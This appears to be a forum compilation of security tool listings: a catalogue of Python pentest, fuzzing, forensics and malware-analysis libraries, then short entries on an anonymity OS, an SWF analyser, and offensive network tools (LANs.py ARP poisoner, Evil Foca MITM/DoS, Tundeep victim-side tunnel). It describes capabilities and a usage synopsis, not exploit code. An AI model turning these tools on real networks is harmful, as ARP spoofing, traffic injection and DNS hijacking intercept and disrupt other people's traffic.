Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out, because the legal situation of these tools is still a bit unclear in Germany -- even after the decision of the highest court. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side.

Network

- Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library
- pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap
- libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
- dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
- Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
- pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
- Dirtbags py-pcap: read pcap files without libpcap
- flowgrep: grep through packet payloads using regular expressions
- Knock Subdomain Scan: enumerate subdomains on a target domain through a wordlist
- Mallory: extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
- Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)

Debugging and reverse engineering

- Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
- Immunity Debugger: scriptable GUI and command line debugger
- mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
- IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
- PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
- pefile: read and work with Portable Executable (aka PE) files
- pydasm: Python interface to the libdasm x86 disassembling library
- PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
- uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
- diStorm: disassembler library for AMD64, licensed under the BSD license
- python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
- vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it
- Androguard: reverse engineering and analysis of Android applications
- Capstone: lightweight multi-platform, multi-architecture disassembly framework with Python bindings
- PyBFD: Python interface to the GNU Binary File Descriptor (BFD) library

Fuzzing

- Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
- Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing (v2 was written in Python)
- antiparser: fuzz testing and fault injection API
- TAOF (The Art of Fuzzing): including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
- untidy: general purpose XML fuzzer
- Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
- SMUDGE
- Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
- Fuzzbox: multi-codec media fuzzer
- Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
- Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
- WSBang: perform automated security testing of SOAP based web services
- Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
- fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
- Fusil: Python library used to write fuzzing programs

Web

- Requests: elegant and simple HTTP library, built for human beings
- HTTPie: human-friendly cURL-like command line HTTP client
- ProxMon: processes proxy logs and reports discovered issues
- WSMap: find web service endpoints and discovery files
- Twill: browse the Web from a command-line interface. Supports automated Web testing
- Ghost.py: webkit web client written in Python
- Windmill: web testing tool designed to let you painlessly automate and debug your web application
- FunkLoad: functional and load web tester
- spynner: Programmatic web browsing module for Python with Javascript/AJAX support
- python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions
- mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
- pathod / pathoc: pathological daemon/client for tormenting HTTP clients and servers

Forensics

- Volatility: extract digital artifacts from volatile memory (RAM) samples
- LibForensics: library for developing digital forensics applications
- TrIDLib: identify file types from their binary signatures. Now includes Python binding
- aft: Android forensic toolkit

Malware analysis

- pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
- Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
- pyClamAV: add virus detection capabilities to your Python software
- jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
- yara-python: identify and classify malware samples
- phoneyc: pure Python honeyclient implementation

PDF

- Didier Stevens' PDF tools: analyse, identify and create PDF files (includes PDFiD, pdf-parser and make-pdf and mPDF)
- Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
- Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
- pyPDF: pure Python PDF toolkit: extract info, split, merge, crop, encrypt, decrypt...
- PDFMiner: extract text from PDF files
- python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support

Misc

- InlineEgg: toolbox of classes for writing small assembly programs in Python
- Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
- RevHosts: enumerate virtual hosts for a given IP address
- simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API
- PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
- Hachoir: view and edit a binary stream field by field
- py-mangle: command line tool and a python library used to create word lists for use with other penetration testing tools

Other useful libraries and tools

- IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
- Beautiful Soup: HTML parser optimized for screen-scraping
- matplotlib: make 2D plots of arrays
- Mayavi: 3D scientific data visualization and plotting
- RTGraph3D: create dynamic graphs in 3D
- Twisted: event-driven networking engine
- Suds: lightweight SOAP client for consuming Web Services
- M2Crypto: most complete OpenSSL wrapper
- NetworkX: graph library (edges, nodes)
- Pandas: library providing high-performance, easy-to-use data structures and data analysis tools
- pyparsing: general parsing module
- lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
- Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
- Pexpect: control and automate other programs, similar to Don Libes' `Expect` system
- Sikuli: visual technology to search and automate GUIs using screenshots. Scriptable in Jython
- PyQt and PySide: Python bindings for the Qt application framework and GUI library

The Python Arsenal for Reverse Engineering is a large collection of tools related to reverse engineering. There is a SANS paper about Python libraries helpful for forensic analysis (PDF). For more Python libraries, please have a look at PyPI, the Python Package Index.

Sursa: Dirk Loss: Python tools for penetration testers
21. Linux Kodachi

Posted by W. Almaawali on Oct 20, 2013

The purpose of Linux Kodachi is to provide a secure, anti-forensic, and anonymous operating system, considering all features that a person who is concerned about privacy would need to have in order to be secure. Kodachi is very easy to use: all you have to do is boot it up on your PC, then you should have an operating system with a VPN connection established + Tor connection established + DNScrypt service running. No setup or Linux knowledge is required from your side; we do it all for you. The entire OS is functional from your temporary memory (RAM), so once you shut it down no trace is left behind; all your activities are wiped out. For a quick guide please click here.

Kodachi is based on the solid Linux Debian with customized Gnome3; this makes Kodachi stable, secure, and unique. View screenshots: 1 – 2 – 3 – 4 – 5 – 6 – 7 – 8 – 9.

How to use it:

First option (recommended): Download the ISO file and burn it on a USB flash memory using a free tool like Rufus or Linux Live, then boot your PC from it. You will need to boot and press the F12 key to get the boot menu and select your USB; on old PCs you have to change your BIOS settings to allow the system to boot from USB as the first option.

Second option: Download the ISO file and burn it on a DVD using a free tool like DAEMON Tools, then boot your PC from it.

Third option: Download the ISO file and boot it up using VMware Player or VirtualBox.

Fourth option: From the first or second option you can permanently install it on your PC.

Sursa: Linux Kodachi | Eagle Eye Digital Solutions | Muscat Oman
22. Adobe SWF Investigator

Perform quick, comprehensive analysis of SWF applications

Adobe® SWF Investigator is the only comprehensive, cross-platform, GUI-based set of tools which enables quality engineers, developers and security researchers to quickly analyze SWF files to improve the quality and security of their applications. With SWF Investigator, you can perform both static and dynamic analysis of SWF applications with just one toolset. SWF Investigator lets you quickly inspect every aspect of a SWF file, from viewing the individual bits all the way through to dynamically interacting with a running SWF.

Download and Discuss

Download SWF Investigator
Discuss SWF Investigator

SWF Investigator Features

From a static perspective, you can disassemble ActionScript 2 (AS2) and ActionScript 3 (AS3) SWFs, view SWF tags and make binary changes to SWF files. SWF Investigator also lets you view associated information, including local shared objects (LSOs) and per-site settings.

From a dynamic perspective, you can call functions within the SWF, load the SWF in various contexts, communicate via local connections and send messages to Action Message Format (AMF) endpoints in order to test more effectively. SWF Investigator contains an extensible fuzzer for SWF applications and AMF services, so you can search for common Web application attacks. This toolset also provides a variety of utilities including encoders and decoders for SWF data, as well as a basic compiler for testing small pieces of ActionScript code.

Additional Benefits

SWF Investigator is the only application of its kind that's built on Adobe AIR – a versatile runtime that supports ActionScript, the language used to create SWF applications. This allows for native interaction between the SWF Investigator and the SWF application. Using ActionScript also makes the source code of the tool more intuitive for SWF developers.

SWF Investigator has the ability to auto-update, so you don't need to worry about whether or not you have the most current version. Since it's an open source AIR application, SWF Investigator can be modified to fit your environment, and it is cross-platform.

Download: Download Adobe SWF Investigator - Adobe Labs
23. LANs.py

Multithreaded asynchronous packet parsing/injecting ARP poisoner. Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays almost all the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.

Prereqs: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), and a wireless card capable of promiscuous mode if you choose not to use the -ip option. Tested on Kali 1.0.

In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.

All options:

python LANs.py [-a] [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-r IPADDRESS] [-set] [-p] [-na] [-n] [-i INTERFACE] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP]

Usage

Simplest usage (including active user targeting):

python LANs.py

Because there's no -ip option this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network including their Windows netbios names along with how many data packets they're sending, so you can immediately target the active ones. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Then you can Ctrl-C and pick your target, which it will then ARP spoof. Simple target identification and ARP spoofing.

Sursa: https://github.com/DanMcInerney/LANs.py
24. Evil Foca - IPv4 and IPv6 Penetration testing tool

Evil Foca is a tool for Pentesters and Security Auditors to perform security testing in IPv4/IPv6 data networks. The tool is capable of doing different attacks such as:

- MITM on IPv4 networks using ARP Spoofing and DHCP ACK injection.
- MITM on IPv6 networks using Neighbor Advertisement Spoofing, SLAAC Attack, fake DHCPv6.
- DoS (Denial of Service) on IPv4 networks using ARP Spoofing.
- DoS (Denial of Service) on IPv6 networks using SLAAC Attack.
- DNS Hijacking.

Download: http://www.informatica64.com

by d3v1l at 7:45 PM

Sursa: Security-Shell: Evil Foca - IPv4 and IPv6 Penetration testing tool
25. Tundeep

Tundeep is a layer 2 VPN/injection tool that resides [almost] entirely in user space on the victim aside from the pcap requirement. This can be handled via a silent install however. The tool will build on Linux and Windows victims. Windows compilation is achieved using Cygwin. The attacker must be a Linux machine however, as kernel TUN/TAP support is required. It works just fine on Backtrack/Kali.

DOWNLOAD/CHANGELOG:

v0.1a_20130910: [DOWNLOAD tundeep_v0.1a_20130910.tgz]
v0.2a_20130916: [DOWNLOAD tundeep_v0.2a_20130916.tgz]

tundeep_v0.2a_20130916:
- IPv6 support (-6, -T)
- Compression support (-C) – must be enabled on both sides
- Better error checking and debugging
- Misc bug fixes and code improvements
- Makefile improvements to detect Cygwin/Linux without manual edits
- README updates
- Added default checksum feature (-K disables) – added overhead, improved reliability. Must be disabled on both sides

Tundeep can also be found on GitHub

Sursa + Tutorial: Tundeep | IO Digital Sec